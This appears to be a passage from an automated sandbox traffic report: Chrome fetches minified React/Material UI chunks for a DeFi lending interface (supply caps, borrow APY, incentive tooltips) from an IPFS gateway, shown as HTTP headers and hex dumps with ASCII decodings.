                                                                                                                                                                                                                                                  Data Ascii: stableBorrowAPY)})),r.sort((function(t,r){return r[e]-t[e]})))},z=function(e,t,r){return e?"position"===t?r.sort((function(e,t){return e.reserve.symbol.toUpperCase()<t.reserve.symbol.toUpperCase()?-1:1})):r.sort((function(e,t){return e.symbol.toUpperCase(
                                                                                                                                                                                                                                                  2024-09-28 04:11:46 UTC1369INData Raw: 74 68 3a 37 30 2c 68 65 69 67 68 74 3a 32 30 7d 29 7d 29 2c 28 30 2c 47 2e 6a 73 78 73 29 28 71 2c 7b 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 47 2e 6a 73 78 29 28 58 2e 5a 2c 7b 68 65 69 67 68 74 3a 33 38 2c 77 69 64 74 68 3a 37 34 7d 29 2c 28 30 2c 47 2e 6a 73 78 29 28 58 2e 5a 2c 7b 68 65 69 67 68 74 3a 33 38 2c 77 69 64 74 68 3a 37 34 2c 73 78 3a 7b 6d 6c 3a 22 36 70 78 22 7d 7d 29 5d 7d 29 5d 7d 29 7d 2c 51 3d 72 28 39 32 33 39 31 29 2c 65 65 3d 72 28 31 35 38 38 30 29 2c 74 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 28 30 2c 47 2e 6a 73 78 73 29 28 65 65 2e 6f 2c 7b 6c 6f 61 64 69 6e 67 3a 21 30 2c 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 47 2e 6a 73 78 29 28 51 2e 58 2c 7b 63 61 70 74 69 6f 6e 3a 28 30 2c 47 2e 6a 73 78 29 28 58 2e 5a 2c
                                                                                                                                                                                                                                                  Data Ascii: th:70,height:20})}),(0,G.jsxs)(q,{children:[(0,G.jsx)(X.Z,{height:38,width:74}),(0,G.jsx)(X.Z,{height:38,width:74,sx:{ml:"6px"}})]})]})},Q=r(92391),ee=r(15880),te=function(){return(0,G.jsxs)(ee.o,{loading:!0,children:[(0,G.jsx)(Q.X,{caption:(0,G.jsx)(X.Z,
                                                                                                                                                                                                                                                  2024-09-28 04:11:46 UTC1369INData Raw: 7b 76 61 72 20 74 3d 65 2e 61 76 61 69 6c 61 62 6c 65 56 61 6c 75 65 2c 72 3d 65 2e 69 73 55 53 44 2c 6f 3d 65 2e 63 61 70 54 79 70 65 2c 61 3d 72 3f 22 22 2e 63 6f 6e 63 61 74 28 74 2c 22 24 22 29 3a 74 2c 69 3d 76 6f 69 64 20 30 3b 72 65 74 75 72 6e 20 74 3e 30 3f 69 3d 6f 3d 3d 3d 4d 2e 52 2e 73 75 70 70 6c 79 43 61 70 3f 28 30 2c 47 2e 6a 73 78 29 28 6e 2e 63 43 2c 7b 69 64 3a 22 54 68 69 73 20 61 73 73 65 74 20 68 61 73 20 61 6c 6d 6f 73 74 20 72 65 61 63 68 65 64 20 69 74 73 20 73 75 70 70 6c 79 20 63 61 70 2e 20 54 68 65 72 65 20 63 61 6e 20 6f 6e 6c 79 20 62 65 20 7b 6d 65 73 73 61 67 65 56 61 6c 75 65 7d 20 73 75 70 70 6c 69 65 64 20 74 6f 20 74 68 69 73 20 6d 61 72 6b 65 74 2e 22 2c 76 61 6c 75 65 73 3a 7b 6d 65 73 73 61 67 65 56 61 6c 75 65 3a
                                                                                                                                                                                                                                                  Data Ascii: {var t=e.availableValue,r=e.isUSD,o=e.capType,a=r?"".concat(t,"$"):t,i=void 0;return t>0?i=o===M.R.supplyCap?(0,G.jsx)(n.cC,{id:"This asset has almost reached its supply cap. There can only be {messageValue} supplied to this market.",values:{messageValue:
                                                                                                                                                                                                                                                  2024-09-28 04:11:46 UTC1369INData Raw: 5a 2c 7b 76 61 72 69 61 6e 74 3a 22 74 6f 6f 6c 74 69 70 22 2c 63 6f 6c 6f 72 3a 22 74 65 78 74 2e 73 65 63 6f 6e 64 61 72 79 22 2c 63 68 69 6c 64 72 65 6e 3a 70 7d 29 2c 28 30 2c 47 2e 6a 73 78 29 28 61 65 2e 42 2c 7b 76 61 6c 75 65 3a 75 3e 3d 30 3f 75 3a 30 2c 63 6f 6d 70 61 63 74 3a 21 30 2c 73 79 6d 62 6f 6c 3a 73 3f 22 55 53 44 22 3a 76 6f 69 64 20 30 2c 76 61 72 69 61 6e 74 3a 22 74 6f 6f 6c 74 69 70 22 7d 29 5d 7d 29 5d 7d 29 7d 2c 75 65 3d 72 28 35 32 39 30 36 29 2c 70 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 2e 76 61 6c 75 65 2c 72 3d 65 2e 69 6e 63 65 6e 74 69 76 65 73 2c 6e 3d 65 2e 73 79 6d 62 6f 6c 2c 61 3d 65 2e 74 6f 6f 6c 74 69 70 2c 69 3d 65 2e 63 68 69 6c 64 72 65 6e 3b 72 65 74 75 72 6e 28 30 2c 47 2e 6a 73 78 73
                                                                                                                                                                                                                                                  Data Ascii: Z,{variant:"tooltip",color:"text.secondary",children:p}),(0,G.jsx)(ae.B,{value:u>=0?u:0,compact:!0,symbol:s?"USD":void 0,variant:"tooltip"})]})]})},ue=r(52906),pe=function(e){var t=e.value,r=e.incentives,n=e.symbol,a=e.tooltip,i=e.children;return(0,G.jsxs
                                                                                                                                                                                                                                                  2024-09-28 04:11:46 UTC1369INData Raw: 73 2c 6c 3d 65 2e 63 75 72 72 65 6e 74 4d 61 72 6b 65 74 2c 63 3d 65 2e 66 72 6f 7a 65 6e 2c 75 3d 65 2e 70 61 75 73 65 64 2c 70 3d 65 2e 62 6f 72 72 6f 77 45 6e 61 62 6c 65 64 2c 78 3d 76 6f 69 64 20 30 3d 3d 3d 70 7c 7c 70 2c 62 3d 65 2e 73 68 6f 77 53 75 70 70 6c 79 43 61 70 54 6f 6f 6c 74 69 70 73 2c 68 3d 76 6f 69 64 20 30 21 3d 3d 62 26 26 62 2c 6d 3d 65 2e 73 68 6f 77 42 6f 72 72 6f 77 43 61 70 54 6f 6f 6c 74 69 70 73 2c 76 3d 76 6f 69 64 20 30 21 3d 3d 6d 26 26 6d 2c 79 3d 65 2e 73 68 6f 77 44 65 62 74 43 65 69 6c 69 6e 67 54 6f 6f 6c 74 69 70 73 2c 6a 3d 76 6f 69 64 20 30 21 3d 3d 79 26 26 79 2c 77 3d 28 30 2c 78 65 2e 5a 29 28 65 2c 4f 65 29 2c 43 3d 28 30 2c 54 2e 6f 76 29 28 29 2c 4f 3d 43 2e 73 75 70 70 6c 79 43 61 70 2c 6b 3d 43 2e 62 6f 72
                                                                                                                                                                                                                                                  Data Ascii: s,l=e.currentMarket,c=e.frozen,u=e.paused,p=e.borrowEnabled,x=void 0===p||p,b=e.showSupplyCapTooltips,h=void 0!==b&&b,m=e.showBorrowCapTooltips,v=void 0!==m&&m,y=e.showDebtCeilingTooltips,j=void 0!==y&&y,w=(0,xe.Z)(e,Oe),C=(0,T.ov)(),O=C.supplyCap,k=C.bor
                                                                                                                                                                                                                                                  2024-09-28 04:11:46 UTC1369INData Raw: 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 74 26 26 28 6e 3d 6e 2e 66 69 6c 74 65 72 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 74 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 29 2c 72 2e 70 75 73 68 2e 61 70 70 6c 79 28 72 2c 6e 29 7d 72 65 74 75 72 6e 20 72 7d 66 75 6e 63 74 69 6f 6e 20 44 65 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 31 3b 74 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 74 2b 2b 29 7b 76 61 72 20 72
                                                                                                                                                                                                                                                  Data Ascii: bject.keys(e);if(Object.getOwnPropertySymbols){var n=Object.getOwnPropertySymbols(e);t&&(n=n.filter((function(t){return Object.getOwnPropertyDescriptor(e,t).enumerable}))),r.push.apply(r,n)}return r}function De(e){for(var t=1;t<arguments.length;t++){var r
                                                                                                                                                                                                                                                  2024-09-28 04:11:46 UTC1369INData Raw: 6e 64 61 72 79 31 34 22 2c 73 78 3a 7b 6d 62 3a 22 32 70 78 22 7d 2c 73 79 6d 62 6f 6c 73 43 6f 6c 6f 72 3a 22 63 6f 6d 6d 6f 6e 2e 77 68 69 74 65 22 2c 63 6f 6d 70 61 63 74 3a 21 31 7d 29 2c 28 30 2c 47 2e 6a 73 78 29 28 61 65 2e 42 2c 7b 76 61 6c 75 65 3a 72 2c 76 61 72 69 61 6e 74 3a 22 73 65 63 6f 6e 64 61 72 79 31 32 22 2c 73 79 6d 62 6f 6c 3a 74 2c 73 79 6d 62 6f 6c 73 43 6f 6c 6f 72 3a 22 63 6f 6d 6d 6f 6e 2e 77 68 69 74 65 22 2c 63 6f 6d 70 61 63 74 3a 21 31 7d 29 5d 7d 29 2c 61 72 72 6f 77 3a 21 30 2c 70 6c 61 63 65 6d 65 6e 74 3a 22 74 6f 70 22 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 47 2e 6a 73 78 29 28 6f 2e 5a 2c 7b 73 78 3a 7b 64 69 73 70 6c 61 79 3a 22 66 6c 65 78 22 2c 66 6c 65 78 44 69 72 65 63 74 69 6f 6e 3a 22 63 6f 6c 75 6d 6e 22 2c 61
                                                                                                                                                                                                                                                  Data Ascii: ndary14",sx:{mb:"2px"},symbolsColor:"common.white",compact:!1}),(0,G.jsx)(ae.B,{value:r,variant:"secondary12",symbol:t,symbolsColor:"common.white",compact:!1})]}),arrow:!0,placement:"top",children:(0,G.jsx)(o.Z,{sx:{display:"flex",flexDirection:"column",a
                                                                                                                                                                                                                                                  2024-09-28 04:11:46 UTC1369INData Raw: 65 78 74 44 65 63 6f 72 61 74 69 6f 6e 3a 22 6e 6f 6e 65 22 2c 63 6f 6c 6f 72 3a 22 69 6e 68 65 72 69 74 22 2c 74 65 78 74 41 6c 69 67 6e 3a 22 63 65 6e 74 65 72 22 7d 2c 74 61 72 67 65 74 3a 22 62 6c 61 6e 6b 22 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 47 2e 6a 73 78 73 29 28 61 2e 5a 2c 7b 76 61 72 69 61 6e 74 3a 22 73 65 63 6f 6e 64 61 72 79 31 34 22 2c 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 47 2e 6a 73 78 29 28 6e 2e 63 43 2c 7b 69 64 3a 22 45 6c 69 67 69 62 6c 65 20 66 6f 72 20 3c 30 3e 32 2e 31 4d 24 3c 2f 30 3e 20 77 45 54 48 20 43 6f 6d 6d 75 6e 69 74 79 20 50 72 6f 67 72 61 6d 20 5c 75 64 38 33 64 5c 75 64 63 37 62 22 2c 63 6f 6d 70 6f 6e 65 6e 74 73 3a 7b 30 3a 28 30 2c 47 2e 6a 73 78 29 28 22 73 74 72 6f 6e 67 22 2c 7b 7d 29 7d 7d 29 2c 28 30 2c
                                                                                                                                                                                                                                                  Data Ascii: extDecoration:"none",color:"inherit",textAlign:"center"},target:"blank",children:(0,G.jsxs)(a.Z,{variant:"secondary14",children:[(0,G.jsx)(n.cC,{id:"Eligible for <0>2.1M$</0> wETH Community Program \ud83d\udc7b",components:{0:(0,G.jsx)("strong",{})}}),(0,


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  78192.168.2.549795209.94.90.34431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:46 UTC504OUTGET /_next/static/chunks/9522.ed3f6cd8a99af04d.js HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:11:46 UTC1360INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:46 GMT
                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                  Content-Length: 40104
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreicnjkwtjlypnmlta3gmyg62hze2e5vkzz7iqopkosmocu6bwxqn44"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/_next/static/chunks/9522.ed3f6cd8a99af04d.js
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeibkk2t3wa2shw62jhntzsugx2oh7gf6zlbu3gb6gdxmeuwt6wi6se,bafybeihww4l5iuauf4leipzwanhudgpdxwdltpxcn6hqqud65jpcaq33xe,bafybeigaj3cwdjktvw36akiq43niv2siihkxaslemvv33lw5mhruragm5a,bafkreicnjkwtjlypnmlta3gmyg62hze2e5vkzz7iqopkosmocu6bwxqn44
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-ny5-04
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  Age: 13028480
                                                                                                                                                                                                                                                  2024-09-28 04:11:46 UTC74INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 61 30 65 34 32 66 36 61 62 34 34 32 64 61 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: Accept-Ranges: bytesServer: cloudflareCF-RAY: 8ca0e42f6ab442da-EWR
                                                                                                                                                                                                                                                  2024-09-28 04:11:46 UTC1369INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 39 35 32 32 5d 2c 7b 36 32 37 35 33 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 3d 6e 28 36 34 38 33 36 29 3b 74 2e 5a 3d 76 6f 69 64 20 30 3b 76 61 72 20 6f 3d 72 28 6e 28 36 34 39 33 38 29 29 2c 61 3d 6e 28 38 35 38 39 33 29 2c 69 3d 28 30 2c 6f 2e 64 65 66 61 75 6c 74 29 28 28 30 2c 61 2e 6a 73 78 29 28 22 70 61 74 68 22 2c 7b 64 3a 22 6d 31 39 2e 37 37 20 37 2e 32 33 2e 30 31 2d 2e 30 31 2d 33 2e 37 32 2d 33 2e 37 32 4c 31 35 20 34 2e 35 36 6c 32 2e 31 31 20 32 2e 31 31 63 2d 2e 39 34 2e 33 36 2d 31 2e 36 31 20 31 2e 32 36
                                                                                                                                                                                                                                                  Data Ascii: "use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[9522],{62753:function(e,t,n){var r=n(64836);t.Z=void 0;var o=r(n(64938)),a=n(85893),i=(0,o.default)((0,a.jsx)("path",{d:"m19.77 7.23.01-.01-3.72-3.72L15 4.56l2.11 2.11c-.94.36-1.61 1.26
                                                                                                                                                                                                                                                  2024-09-28 04:11:46 UTC1369INData Raw: 65 78 53 68 72 69 6e 6b 3a 30 2c 66 6f 6e 74 53 69 7a 65 3a 7b 69 6e 68 65 72 69 74 3a 22 69 6e 68 65 72 69 74 22 2c 73 6d 61 6c 6c 3a 65 2e 74 79 70 6f 67 72 61 70 68 79 2e 70 78 54 6f 52 65 6d 28 32 30 29 2c 6d 65 64 69 75 6d 3a 65 2e 74 79 70 6f 67 72 61 70 68 79 2e 70 78 54 6f 52 65 6d 28 32 34 29 2c 6c 61 72 67 65 3a 65 2e 74 79 70 6f 67 72 61 70 68 79 2e 70 78 54 6f 52 65 6d 28 33 36 29 7d 5b 74 2e 66 6f 6e 74 53 69 7a 65 5d 2c 63 6f 6c 6f 72 3a 7b 70 72 69 6d 61 72 79 3a 28 65 2e 76 61 72 73 7c 7c 65 29 2e 70 61 6c 65 74 74 65 2e 70 72 69 6d 61 72 79 2e 6d 61 69 6e 2c 73 65 63 6f 6e 64 61 72 79 3a 28 65 2e 76 61 72 73 7c 7c 65 29 2e 70 61 6c 65 74 74 65 2e 73 65 63 6f 6e 64 61 72 79 2e 6d 61 69 6e 2c 69 6e 66 6f 3a 28 65 2e 76 61 72 73 7c 7c 65 29
                                                                                                                                                                                                                                                  Data Ascii: exShrink:0,fontSize:{inherit:"inherit",small:e.typography.pxToRem(20),medium:e.typography.pxToRem(24),large:e.typography.pxToRem(36)}[t.fontSize],color:{primary:(e.vars||e).palette.primary.main,secondary:(e.vars||e).palette.secondary.main,info:(e.vars||e)
                                                                                                                                                                                                                                                  2024-09-28 04:11:46 UTC1369INData Raw: 2e 6c 65 6e 67 74 68 2d 31 26 26 65 2e 70 75 73 68 28 61 2e 63 6c 6f 6e 65 45 6c 65 6d 65 6e 74 28 74 2c 7b 6b 65 79 3a 60 73 65 70 61 72 61 74 6f 72 2d 24 7b 6f 7d 60 7d 29 29 2c 65 29 29 2c 5b 5d 29 7d 63 6f 6e 73 74 20 78 3d 28 30 2c 75 2e 5a 50 29 28 22 64 69 76 22 2c 7b 6e 61 6d 65 3a 22 4d 75 69 53 74 61 63 6b 22 2c 73 6c 6f 74 3a 22 52 6f 6f 74 22 2c 6f 76 65 72 72 69 64 65 73 52 65 73 6f 6c 76 65 72 3a 28 65 2c 74 29 3d 3e 5b 74 2e 72 6f 6f 74 5d 7d 29 28 28 28 7b 6f 77 6e 65 72 53 74 61 74 65 3a 65 2c 74 68 65 6d 65 3a 74 7d 29 3d 3e 7b 6c 65 74 20 6e 3d 28 30 2c 6f 2e 5a 29 28 7b 64 69 73 70 6c 61 79 3a 22 66 6c 65 78 22 2c 66 6c 65 78 44 69 72 65 63 74 69 6f 6e 3a 22 63 6f 6c 75 6d 6e 22 7d 2c 28 30 2c 69 2e 6b 39 29 28 7b 74 68 65 6d 65 3a 74
                                                                                                                                                                                                                                                  Data Ascii: .length-1&&e.push(a.cloneElement(t,{key:`separator-${o}`})),e)),[])}const x=(0,u.ZP)("div",{name:"MuiStack",slot:"Root",overridesResolver:(e,t)=>[t.root]})((({ownerState:e,theme:t})=>{let n=(0,o.Z)({display:"flex",flexDirection:"column"},(0,i.k9)({theme:t
                                                                                                                                                                                                                                                  2024-09-28 04:11:46 UTC1369INData Raw: 28 35 39 34 39 39 29 2c 6f 3d 6e 28 34 37 33 30 29 2c 61 3d 6e 28 34 39 35 30 31 29 2c 69 3d 6e 28 31 32 37 39 29 2c 73 3d 6e 28 36 32 30 39 37 29 2c 63 3d 6e 28 33 30 31 32 30 29 2c 6c 3d 6e 28 32 39 36 33 30 29 2c 75 3d 6e 28 37 35 30 38 34 29 2c 64 3d 6e 28 37 30 37 39 34 29 2c 70 3d 6e 28 34 31 30 32 34 29 2c 6d 3d 6e 28 38 35 38 39 33 29 2c 66 3d 5b 22 76 61 6c 75 65 22 2c 22 6f 6e 49 6e 66 6f 43 6c 69 63 6b 22 2c 22 48 41 4c 49 6e 74 65 67 72 61 74 69 6f 6e 43 6f 6d 70 6f 6e 65 6e 74 22 5d 3b 66 75 6e 63 74 69 6f 6e 20 78 28 65 2c 74 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 72 3d 4f 62 6a 65 63 74 2e 67 65 74 4f
                                                                                                                                                                                                                                                  Data Ascii: (59499),o=n(4730),a=n(49501),i=n(1279),s=n(62097),c=n(30120),l=n(29630),u=n(75084),d=n(70794),p=n(41024),m=n(85893),f=["value","onInfoClick","HALIntegrationComponent"];function x(e,t){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var r=Object.getO
                                                                                                                                                                                                                                                  2024-09-28 04:11:46 UTC1369INData Raw: 73 78 3a 7b 6d 69 6e 57 69 64 74 68 3a 22 75 6e 73 65 74 22 2c 6d 6c 3a 7b 78 73 3a 30 2c 78 73 6d 3a 32 7d 7d 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 6d 2e 6a 73 78 29 28 61 2e 63 43 2c 7b 69 64 3a 22 52 69 73 6b 20 64 65 74 61 69 6c 73 22 7d 29 7d 29 2c 72 26 26 28 30 2c 6d 2e 6a 73 78 29 28 63 2e 5a 2c 7b 6d 6c 3a 7b 78 73 3a 30 2c 78 73 6d 3a 32 7d 2c 6d 74 3a 7b 78 73 3a 31 2c 78 73 6d 3a 30 7d 2c 63 68 69 6c 64 72 65 6e 3a 72 7d 29 5d 7d 29 7d 7d 2c 38 31 39 30 32 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 3b 6e 2e 64 28 74 2c 7b 52 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 72 7d 7d 29 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 73 75 70 70 6c 79 43 61 70 3d 22 73 75 70 70 6c 79 43 61 70 22 2c 65 2e 62 6f 72 72
                                                                                                                                                                                                                                                  Data Ascii: sx:{minWidth:"unset",ml:{xs:0,xsm:2}},children:(0,m.jsx)(a.cC,{id:"Risk details"})}),r&&(0,m.jsx)(c.Z,{ml:{xs:0,xsm:2},mt:{xs:1,xsm:0},children:r})]})}},81902:function(e,t,n){var r;n.d(t,{R:function(){return r}}),function(e){e.supplyCap="supplyCap",e.borr
                                                                                                                                                                                                                                                  2024-09-28 04:11:46 UTC1369INData Raw: 31 20 31 35 2e 39 32 38 34 20 31 2e 33 32 30 33 31 20 31 35 2e 33 39 37 39 56 36 2e 33 39 37 39 35 43 31 2e 33 32 30 33 31 20 35 2e 38 36 37 35 32 20 31 2e 35 33 31 30 33 20 35 2e 33 35 38 38 31 20 31 2e 39 30 36 31 20 34 2e 39 38 33 37 34 43 32 2e 32 38 31 31 37 20 34 2e 36 30 38 36 36 20 32 2e 37 38 39 38 38 20 34 2e 33 39 37 39 35 20 33 2e 33 32 30 33 31 20 34 2e 33 39 37 39 35 48 31 37 2e 33 32 30 33 43 31 37 2e 38 35 30 37 20 34 2e 33 39 37 39 35 20 31 38 2e 33 35 39 35 20 34 2e 36 30 38 36 36 20 31 38 2e 37 33 34 35 20 34 2e 39 38 33 37 34 43 31 39 2e 31 30 39 36 20 35 2e 33 35 38 38 31 20 31 39 2e 33 32 30 33 20 35 2e 38 36 37 35 32 20 31 39 2e 33 32 30 33 20 36 2e 33 39 37 39 35 56 31 35 2e 33 39 37 39 43 31 39 2e 33 32 30 33 20 31 35 2e 39 32 38
                                                                                                                                                                                                                                                  Data Ascii: 1 15.9284 1.32031 15.3979V6.39795C1.32031 5.86752 1.53103 5.35881 1.9061 4.98374C2.28117 4.60866 2.78988 4.39795 3.32031 4.39795H17.3203C17.8507 4.39795 18.3595 4.60866 18.7345 4.98374C19.1096 5.35881 19.3203 5.86752 19.3203 6.39795V15.3979C19.3203 15.928
                                                                                                                                                                                                                                                  2024-09-28 04:11:46 UTC1369INData Raw: 6e 29 7b 6e 2e 64 28 74 2c 7b 4d 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 79 7d 7d 29 3b 76 61 72 20 72 3d 6e 28 31 32 37 39 29 2c 6f 3d 6e 28 38 30 30 35 39 29 2c 61 3d 6e 28 33 30 31 32 30 29 2c 69 3d 6e 28 32 39 36 33 30 29 2c 73 3d 6e 28 38 31 36 34 35 29 2c 63 3d 6e 28 36 37 32 39 34 29 2c 6c 3d 6e 28 37 38 33 37 31 29 2c 75 3d 6e 28 35 37 36 30 39 29 2c 64 3d 6e 28 39 37 35 36 33 29 2c 70 3d 6e 28 34 31 30 32 34 29 2c 6d 3d 6e 28 37 32 36 36 37 29 2c 66 3d 6e 28 34 39 35 30 31 29 2c 78 3d 6e 28 39 32 33 39 31 29 2c 76 3d 6e 28 38 35 38 39 33 29 2c 68 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 2e 69 6e 63 65 6e 74 69 76 65 73 2c 6e 3d 65 2e 69 6e 63 65 6e 74 69 76 65 73 4e 65 74 41 50 52 2c 72 3d 65 2e 73 79 6d 62 6f
                                                                                                                                                                                                                                                  Data Ascii: n){n.d(t,{M:function(){return y}});var r=n(1279),o=n(80059),a=n(30120),i=n(29630),s=n(81645),c=n(67294),l=n(78371),u=n(57609),d=n(97563),p=n(41024),m=n(72667),f=n(49501),x=n(92391),v=n(85893),h=function(e){var t=e.incentives,n=e.incentivesNetAPR,r=e.symbo
                                                                                                                                                                                                                                                  2024-09-28 04:11:46 UTC1369INData Raw: 69 76 65 41 50 52 3a 65 2e 69 6e 63 65 6e 74 69 76 65 41 50 52 7d 29 7d 2c 65 2e 72 65 77 61 72 64 54 6f 6b 65 6e 41 64 64 72 65 73 73 29 7d 29 29 2c 74 2e 6c 65 6e 67 74 68 3e 31 26 26 28 30 2c 76 2e 6a 73 78 29 28 61 2e 5a 2c 7b 73 78 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 7b 70 74 3a 31 2c 6d 74 3a 31 2c 62 6f 72 64 65 72 3a 22 31 70 78 20 73 6f 6c 69 64 20 22 2e 63 6f 6e 63 61 74 28 65 2e 70 61 6c 65 74 74 65 2e 64 69 76 69 64 65 72 29 7d 7d 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 76 2e 6a 73 78 29 28 78 2e 58 2c 7b 63 61 70 74 69 6f 6e 3a 28 30 2c 76 2e 6a 73 78 29 28 66 2e 63 43 2c 7b 69 64 3a 22 4e 65 74 20 41 50 52 22 7d 29 2c 68 65 69 67 68 74 3a 33 32 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 76 2e 6a 73 78 29 28 73 2c 7b 69 6e 63
                                                                                                                                                                                                                                                  Data Ascii: iveAPR:e.incentiveAPR})},e.rewardTokenAddress)})),t.length>1&&(0,v.jsx)(a.Z,{sx:function(e){return{pt:1,mt:1,border:"1px solid ".concat(e.palette.divider)}},children:(0,v.jsx)(x.X,{caption:(0,v.jsx)(f.cC,{id:"Net APR"}),height:32,children:(0,v.jsx)(s,{inc
